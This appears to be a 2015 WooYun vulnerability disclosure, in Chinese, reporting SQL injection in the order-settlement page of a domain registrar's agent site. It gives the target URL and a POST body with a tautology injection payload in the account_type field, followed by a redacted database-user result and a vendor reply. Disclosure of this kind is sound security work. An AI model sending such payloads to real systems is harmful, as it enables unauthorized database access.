域名服务商安全之纳网科技某处SQL注射

发表于 2015年07月10日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0125904

漏洞标题：域名服务商安全之纳网科技某处SQL注射

漏洞详情

披露状态：

2015-07-10: 积极联系厂商并且等待厂商认领中，细节不对外公开
2015-08-24: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

1，<br>
agent.nawang.cn/order/order/settlement/menu1/menu2/menu2/0/menu3/member_id/order_str/我是注入点/source/wfk2,<br>
订单支付的地方。<br>
agent.nawang.cn/order/order/settlement<br>
post:<br>
account_type=1' or 2>1 and 'a'='a&ckb_all=1&inputForm_num=1&orderData%5b%5d=1746279&orderData%5b%5d=1746278&orderData%5b%5d=1746273&orderData%5b%5d=1746280&orderData%5b%5d=1746284&orderData%5b%5d=1746285&orderData%5b%5d=1746283&orderData%5b%5d=1746281&orderData%5b%5d=1746282

1，

agent.nawang.cn/order/order/settlement/menu1/menu2/menu2/0/menu3/member_id/order_str/我是注入点/source/wfk2,

订单支付的地方。

agent.nawang.cn/order/order/settlement

post:

account_type=1' or 2>1 and 'a'='a&ckb_all=1&inputForm_num=1&orderData%5b%5d=1746279&orderData%5b%5d=1746278&orderData%5b%5d=1746273&orderData%5b%5d=1746280&orderData%5b%5d=1746284&orderData%5b%5d=1746285&orderData%5b%5d=1746283&orderData%5b%5d=1746281&orderData%5b%5d=1746282

漏洞证明：

current-user: [email protected]

1	current-user: [email protected]

修复方案：

修复！

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

评价

2010-01-01 00:00 http://www.wooyun.org/corps/厦门纳网科技有限公司白帽子 | Rank:0 漏洞数:0)

此事已确认为技术问题，漏洞发现后我方已迅速修正。感谢您为纳网提出的宝贵建议，我们都会重视并迅速提出解决方案的，用户的最佳体验才是我们的服务宗旨。纳网科技，我们一直在努力。

原文连接：域名服务商安全之纳网科技某处SQL注射 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。